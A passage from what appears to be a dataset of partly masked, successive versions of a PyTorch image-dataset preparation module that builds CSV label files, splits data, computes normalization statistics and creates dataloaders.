transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n",
"step-3": "<mask token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\n<mask token>\n\n\ndef get_index(arr, a):\n for i in range(len(arr)):\n if sum(arr[i] == a) == len(a):\n return i\n return False\n\n\ndef rescale_bbox(bb, row_scale, col_scale):\n bb = bb.reshape((-1, 4))\n for b in bb:\n r1, c1, r2, c2 = b\n b[0] = int(np.round(r1 * col_scale))\n b[1] = int(np.round(c1 * row_scale))\n b[2] = int(np.round(r2 * col_scale))\n b[3] = int(np.round(c2 * row_scale))\n bb = bb.reshape((1, -1))\n return bb\n\n\ndef get_img_stats(dataset, sz):\n size = int(len(dataset) * sz)\n i = 0\n imgs = []\n for img, _ in dataset:\n if i > size:\n break\n imgs.append(img)\n i += 1\n imgs_ = torch.stack(imgs, dim=3)\n imgs_ = imgs_.view(3, -1)\n imgs_mean = imgs_.mean(dim=1)\n imgs_std = imgs_.std(dim=1)\n return imgs_mean, imgs_std\n\n\n<mask token>\n\n\ndef save_obj(obj, path):\n with open(path, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\n\n<mask token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n",
"step-4": "<mask token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\n<mask token>\n\n\ndef listdir_fullpath(d):\n return [os.path.join(d, f) for f in os.listdir(d)]\n\n\n<mask token>\n\n\ndef csv_from_path(path, img_dest):\n path = Path(path)\n img_dest = Path(img_dest)\n labels_paths = list(path.iterdir())\n tr_images = []\n tr_labels = []\n for l in labels_paths:\n if l.is_dir():\n for i in list(l.iterdir()):\n if i.suffix in IMG_EXTENSIONS:\n name = i.name\n label = l.name\n new_name = '{}_{}'.format(path.name, name)\n new_path = img_dest / new_name\n os.rename(i, new_path)\n tr_images.append(new_name)\n tr_labels.append(label)\n tr_img_label = {'Img': tr_images, 'Label': tr_labels}\n csv = pd.DataFrame(tr_img_label, columns=['Img', 'Label'])\n csv = csv.sample(frac=1).reset_index(drop=True)\n return csv\n\n\ndef add_extension(a, e):\n a = [(x + e) for x in a]\n return a\n\n\ndef one_hot(targets, multi=False):\n if multi:\n binerizer = MultiLabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n else:\n binerizer = LabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n return dai_1hot, binerizer.classes_\n\n\ndef get_index(arr, a):\n for i in range(len(arr)):\n if sum(arr[i] == a) == len(a):\n return i\n return False\n\n\ndef rescale_bbox(bb, row_scale, col_scale):\n bb = bb.reshape((-1, 4))\n for b in bb:\n r1, c1, r2, c2 = b\n b[0] = int(np.round(r1 * col_scale))\n b[1] = int(np.round(c1 * row_scale))\n b[2] = int(np.round(r2 * col_scale))\n b[3] = int(np.round(c2 * row_scale))\n bb = bb.reshape((1, -1))\n return bb\n\n\ndef get_img_stats(dataset, sz):\n size = int(len(dataset) * sz)\n i = 0\n imgs = []\n for img, _ in dataset:\n if i > size:\n break\n imgs.append(img)\n i += 1\n imgs_ = torch.stack(imgs, dim=3)\n imgs_ = imgs_.view(3, -1)\n imgs_mean = imgs_.mean(dim=1)\n imgs_std = imgs_.std(dim=1)\n return imgs_mean, imgs_std\n\n\ndef split_df(train_df, test_size=0.15):\n try:\n train_df, val_df = train_test_split(train_df, test_size=test_size,\n random_state=2, stratify=train_df.iloc[:, 1])\n except:\n train_df, val_df = train_test_split(train_df, test_size=test_size,\n random_state=2)\n train_df = train_df.reset_index(drop=True)\n val_df = val_df.reset_index(drop=True)\n return train_df, val_df\n\n\ndef save_obj(obj, path):\n with open(path, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef load_obj(path):\n with open(path, 'rb') as f:\n return pickle.load(f)\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, 